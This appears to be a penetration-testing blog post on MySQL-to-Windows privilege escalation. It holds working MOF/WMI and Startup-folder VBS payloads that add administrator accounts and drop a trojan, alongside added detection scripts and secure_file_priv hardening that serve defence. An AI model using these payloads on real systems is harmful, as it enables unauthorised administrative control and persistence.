[Penetration Testing] Server Privilege Escalation: MySQL Privilege Escalation

2017-08-11  Read by 554 people  lndyzwdxhs

0x01: To escalate privileges on the server through MySQL, you must first obtain MySQL root privileges

0x02: Privilege escalation using MySQL

```mof
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer   = $Consumer;
    Filter = $EventFilter;
};
```
Save it as: 1.mof
Then execute the following in MySQL:
```sql
select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
```
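From the defender's side, the file written above is what a responder would want to triage: a MOF that instantiates an `__EventFilter`, a script-executing consumer and an `__FilterToConsumerBinding` in `root\subscription` registers a permanent WMI subscription, and on Windows XP/2003 anything dropped into `system32\wbem\mof` is compiled automatically (later Windows versions no longer auto-compile that directory, but the subscription pattern itself still applies). The script below is an added example, not code from the original post: it statically scans MOF text for that pattern and reports a severity. Both MOF samples embedded in it are constructed for the demonstration; the class and token lists are my own choices.

```python
"""Static triage of a .mof file for the persistent-WMI-subscription pattern
(event filter + script/command consumer + binding). Added defender-side
example, not code from the original post; both MOF samples are constructed."""
import re
import sys

# Classes that together register a permanent WMI event subscription.
SUBSCRIPTION_CLASSES = ("__EventFilter", "__FilterToConsumerBinding")
# Consumer classes that run script or command lines when the filter fires.
ACTIVE_CONSUMERS = ("ActiveScriptEventConsumer", "CommandLineEventConsumer")
# Tokens in consumer text that usually mean command execution or account changes.
SUSPICIOUS_TOKENS = ("WScript.Shell", "net.exe user", "net user",
                     "net localgroup", "cmd.exe", "powershell")

INSTANCE_RE = re.compile(r"instance\s+of\s+([A-Za-z0-9_]+)", re.IGNORECASE)


def analyze_mof(text):
    """Return instantiated classes, readable findings and an overall severity."""
    classes = INSTANCE_RE.findall(text)
    findings = []
    has_subscription = any(c in classes for c in SUBSCRIPTION_CLASSES)
    if has_subscription:
        findings.append("registers a permanent WMI event subscription")
    consumers = [c for c in classes if c in ACTIVE_CONSUMERS]
    for c in consumers:
        findings.append("uses code-executing consumer " + c)
    lowered = text.lower()
    tokens = [t for t in SUSPICIOUS_TOKENS if t.lower() in lowered]
    if tokens:
        findings.append("consumer text contains: " + ", ".join(tokens))
    if "win32_localtime" in lowered:
        findings.append("filter triggers on Win32_LocalTime (periodic timer)")
    if has_subscription and consumers:
        severity = "high"
    elif findings:
        severity = "medium"
    else:
        severity = "none"
    return {"classes": classes, "findings": findings, "severity": severity}


# Constructed sample mirroring the filter/consumer/binding pattern.
SAMPLE_SUBSCRIPTION_MOF = r'''
#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "sampleFilter";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "sampleConsumer";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\");\nWSH.run(\"net.exe user sample sample /add\");";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
'''

# Constructed benign sample: a plain class definition, no subscription at all.
SAMPLE_CLASS_MOF = r'''
#pragma namespace("\\\\.\\root\\cimv2")
class Sample_AppStatus
{
    [key] string Name;
    uint32 Value;
};
'''


def read_text(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return fh.read()


if __name__ == "__main__":
    # Usage: python mof_triage.py [file.mof ...]; with no arguments the samples are analysed.
    targets = [(p, read_text(p)) for p in sys.argv[1:]]
    if not targets:
        targets = [("subscription-sample", SAMPLE_SUBSCRIPTION_MOF),
                   ("class-sample", SAMPLE_CLASS_MOF)]
    for name, text in targets:
        result = analyze_mof(text)
        print(name, "->", result["severity"])
        for finding in result["findings"]:
            print("   ", finding)
```

Severity is "high" only when both a subscription and a code-executing consumer are present, so a MOF that merely defines a class or registers a filter without a consumer is reported at "medium" or "none" rather than flooding the queue.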
VBS startup-item privilege escalation
```sql
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user iis_user 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators iis_user /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
```
First connect to the database from the webshell, create the table, write the VBS into the table, then export it into the Startup folder. If UDF privilege escalation does not work you can also try this method; the prerequisite is ROOT privileges. The trailing ,0 means no CMD window pops up and it runs silently.
It can also be written like this:
```sql
create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
```
Executing the first 3 statements writes the trojan into the Startup folder. The prerequisites are that the trojan must be in hexadecimal, and the path must use \\, because Windows automatically filters out one \.
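Every variant in this section, and the MOF variant before it, relies on the same three MySQL capabilities: `SELECT ... INTO OUTFILE`/`INTO DUMPFILE` writing to an arbitrary path, `LOAD_FILE()` reading one, and (for the UDF route the post mentions) `CREATE FUNCTION ... SONAME` loading a library. The configuration counterpart is `secure_file_priv`: pointing it at a dedicated directory confines OUTFILE/DUMPFILE/LOAD_FILE to that directory, and setting it to NULL disables them entirely, so even a root account cannot drop files into the Startup folder or `wbem\mof`. The script below is an added detection example, not code from the original post: it scans MySQL general-log lines for those statements and raises the severity when the target path lands in a sensitive directory. The log lines are constructed; the column layout follows the general-log format, and the parser works line by line, so a statement split across several log lines is not reassembled.

```python
"""Scan MySQL general-log lines for statements that read or write server files.
Added defender-side example, not from the original post: flags INTO OUTFILE /
INTO DUMPFILE writes (high severity into Startup or wbem\\mof), LOAD_FILE reads,
and CREATE FUNCTION ... SONAME (UDF loading). Sample log lines are constructed."""
import re

# general log columns: time, connection id, command type, argument
LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+(?P<cmd>\w+)\s+(?P<arg>.*)$")
WRITE_RE = re.compile(r"""into\s+(outfile|dumpfile)\s+(['"])(.*?)\2""", re.I)
READ_RE = re.compile(r"""load_file\s*\(\s*(['"])(.*?)\1\s*\)""", re.I)
UDF_RE = re.compile(
    r"""create\s+(?:aggregate\s+)?function\s+\S+\s+returns\s+\w+\s+soname\s+(['"])(.*?)\1""",
    re.I)

# Directory markers (after normalisation) whose writes deserve an alert;
# "启动" is the localised Startup folder name used in the post's paths.
SENSITIVE_DIRS = ("\\wbem\\mof\\", "\\startup\\", "\\启动\\", "\\system32\\")


def normalize_path(p):
    """SQL literals double every backslash; collapse them and unify separators."""
    return p.replace("\\\\", "\\").replace("/", "\\").lower()


def is_sensitive(p):
    return any(marker in normalize_path(p) for marker in SENSITIVE_DIRS)


def scan_general_log(lines):
    """Return one finding dict per file read, file write or UDF load found."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.rstrip("\n"))
        if not m or m.group("cmd").lower() != "query":
            continue
        base = {"ts": m.group("ts"), "conn": m.group("conn")}
        sql = m.group("arg")
        for r in READ_RE.finditer(sql):
            findings.append(dict(base, kind="file_read", path=r.group(2), severity="medium"))
        for w in WRITE_RE.finditer(sql):
            path = w.group(3)
            findings.append(dict(base, kind="file_write", path=path,
                                 severity="high" if is_sensitive(path) else "medium"))
        u = UDF_RE.search(sql)
        if u:
            findings.append(dict(base, kind="udf_load", path=u.group(2), severity="high"))
    return findings


# Constructed general-log excerpt (timestamp, connection id, command, statement).
SAMPLE_LOG = [
    "2017-08-11T10:15:01Z\t   12 Query\tselect 1",
    "2017-08-11T10:15:02Z\t   12 Query\t"
    + r'select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs"',
    "2017-08-11T10:15:03Z\t   13 Query\t"
    + r"select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'",
    "2017-08-11T10:15:04Z\t   14 Query\tselect * from users into outfile '/tmp/export.csv'",
    "2017-08-11T10:15:05Z\t   15 Query\tcreate function my_udf returns string soname 'my_udf.dll'",
]

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f["ts"], "conn", f["conn"], f["severity"].upper(), f["kind"], f["path"])
```

Point the same function at a real `general_log_file` (or at the binary log rendered with `mysqlbinlog`, which records the same `INTO OUTFILE` statements) and treat any "high" finding from a web-application account as an incident: an application user has no business writing files, and a root account writing into `system32` is exactly the sequence this post describes.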

0x03: Scope of script permissions
